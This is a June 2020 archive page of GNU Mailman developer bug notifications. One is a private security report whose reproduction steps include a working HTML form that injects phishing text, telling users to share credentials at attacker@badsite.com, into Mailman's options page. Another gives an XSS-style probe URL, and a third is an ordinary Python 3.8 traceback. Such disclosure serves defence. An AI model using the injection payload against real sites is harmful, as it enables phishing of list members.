Mailman-coders June 2020

mailman-coders@python.org

9 participants
13 discussions

[Bug 1884752] [NEW] Brute forcing to match the admin list at www.example.com//mailman/edithtml/tests/listinfo.html?html_code=XSS%20demo
by Kamran Hasan 23 Jun '20

23 Jun '20

*** This bug is a security vulnerability *** Private security bug reported: The brute forcing technique can be implemented to surpass the error message stating no such list tests. Such a address can exploit users data: www.example.com//mailman/edithtml/tests/listinfo.html?html_code=XSS%20demo ** Affects: mailman Importance: Undecided Status: New -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1884752 Title: Brute forcing to match the admin list at www.example.com//mailman/edithtml/tests/listinfo.html?html_code=XSS%20demo To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1884752/+subscriptions

2 4

[Bug 1873722] [NEW] Arbitrary Content Injection via the options login page.
by Mark Sapiro 23 Jun '20

23 Jun '20

*** This bug is a security vulnerability *** Private security bug reported: An issue similar to CVE - https://www.cvedetails.com/cve/CVE-2018-13796/ exists at different endpoint & param. It can lead to a phishing attack. Steps To Reproduce: 1. Copy and save the following HTML code and open it in any browser. Code: <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://example.com/mailman/options/mailman" method="POST"> <input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" /> <input type="hidden" name="UserOptions" value="Unsubscribe or edit options" /> <input type="hidden" name="language" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2. Can be seen there- "Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker(a)badsite.com" message will be displayed on the screen. ** Affects: mailman Importance: Medium Assignee: Mark Sapiro (msapiro) Status: Confirmed -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1873722 Title: Arbitrary Content Injection via the options login page. To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1873722/+subscriptions

3 5

[Bug 1882660] [NEW] Mailman and Python 3.8 incompatibility - unable to subscribe a list
by František Kučera 09 Jun '20

09 Jun '20

Public bug reported: In Ubuntu 20.04 LTS, it seems that Mailman3 package (3.2.2-1) is incompatible with Python 3.8 which is used in 20.04. How to reproduce: try to subscribe a list through the web interface https://.../mailman3/postorius/lists/.../ it returns an error and in /var/log/mailman3/mailman.log you will find: Jun 08 17:35:57 2020 (6830) Uncaught runner exception: module 'time' has no attribute 'clock' Jun 08 17:35:58 2020 (6830) Traceback (most recent call last): File "/usr/lib/python3/dist-packages/mailman/core/runner.py", line 173, in _one_iteration self._process_one_file(msg, msgdata) File "/usr/lib/python3/dist-packages/mailman/core/runner.py", line 266, in _process_one_file keepqueued = self._dispose(mlist, msg, msgdata) File "/usr/lib/python3/dist-packages/mailman/runners/incoming.py", line 79, in _dispose process(mlist, msg, msgdata, start_chain) File "/usr/lib/python3/dist-packages/mailman/core/chains.py", line 79, in process link.function(mlist, msg, msgdata) File "/usr/lib/python3/dist-packages/mailman/chains/hold.py", line 147, in _process request_id = hold_message(mlist, msg, msgdata, SEMISPACE.join(reasons)) File "/usr/lib/python3/dist-packages/mailman/app/moderator.py", line 88, in hold_message request_id = requestsdb.hold_request( File "/usr/lib/python3/dist-packages/mailman/database/transaction.py", line 85, in wrapper return function(args[0], config.db.store, *args[1:], **kws) File "/usr/lib/python3/dist-packages/mailman/model/requests.py", line 100, in hold_request token = getUtility(IPendings).add(pendable, timedelta(days=5000)) File "/usr/lib/python3/dist-packages/mailman/database/transaction.py", line 85, in wrapper return function(args[0], config.db.store, *args[1:], **kws) File "/usr/lib/python3/dist-packages/mailman/model/pending.py", line 91, in add token = token_factory.new() File "/usr/lib/python3/dist-packages/mailman/utilities/uid.py", line 79, in new return self._next_unpredictable_id() File "/usr/lib/python3/dist-packages/mailman/utilities/uid.py", line 155, in _next_unpredictable_id x = random.random() + right_now % 1.0 + time.clock() % 1.0 AttributeError: module 'time' has no attribute 'clock' This bug has been already fixed in upstream: https://gitlab.com/mailman/mailman/-/commit/ea05bdd0f74ba06d85adad1f7d190a6… Workaround: patch the files /usr/lib/python3/dist-packages/mailman/ by hand and restart mailman. ** Affects: mailman Importance: Undecided Status: New ** Affects: mailman3 (Ubuntu) Importance: Undecided Status: New ** Tags: mailman3 ** Also affects: mailman3 (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1882660 Title: Mailman and Python 3.8 incompatibility - unable to subscribe a list To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1882660/+subscriptions

3 2

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

2005

2004

2003

Mailman-coders June 2020